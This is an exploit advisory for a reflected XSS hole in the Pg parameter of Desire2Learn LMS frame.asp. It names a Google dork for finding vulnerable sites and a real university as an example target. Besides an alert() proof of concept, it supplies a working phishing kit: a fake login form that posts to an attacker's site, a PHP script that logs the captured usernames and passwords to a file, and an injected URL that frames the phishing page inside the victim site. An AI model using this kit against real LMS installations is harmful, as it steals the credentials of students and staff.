# Exploit Title: Desire2Learn LMS XSS
# Google Dork: allintext:Powered by Desire2Learn
# Date: 4/22/16
# Exploit Author: @CrazedSec
# Vendor Homepage: http://www.d2l.com/
# Tested on: Firefox on Mac 10.8.5

Description: Desire2Learn has a reflected xss vulnerability in the Pg parameter within frame.asp.

PoC #1:
1. Google allintext:Powered by Desire2Learn and find a site with the LMS. (example: learn.colorado.edu)
2. Add /frame.asp?Pg=javascript:alert('xss by @grumpysec')

PoC #2

Host 2 files on a site

#========= phish.html =========#
<html>
<div style="text-align: center;">
    <form Method="post" action="http://www.yoursite/phish.php">
        <br>
        <font color="red">Please login to continue!</font><br><br>Username :<br /> <input name="User" /><br />Password :<br />
        <input name="Password" type="password" /><br /><br /><input name="Valid" value="Login" type="submit" />
        <br /></form>
</div>
</body>
</html>

#========= phish.php =========#

<?php
$login = $_POST['user'];
$password = $_POST['Password'];
$open = fopen('pwned.txt', 'a+');
fputs($open, 'Username : ' . $login . '<br >' . '
Password : ' . $password . '<br >' . '<br >');
?>

learn.colorado.edu/frame.asp?Pg=http://yourphishingsite.com/phish.html

Enjoy
[email protected]

# siph0n [2016-05-12]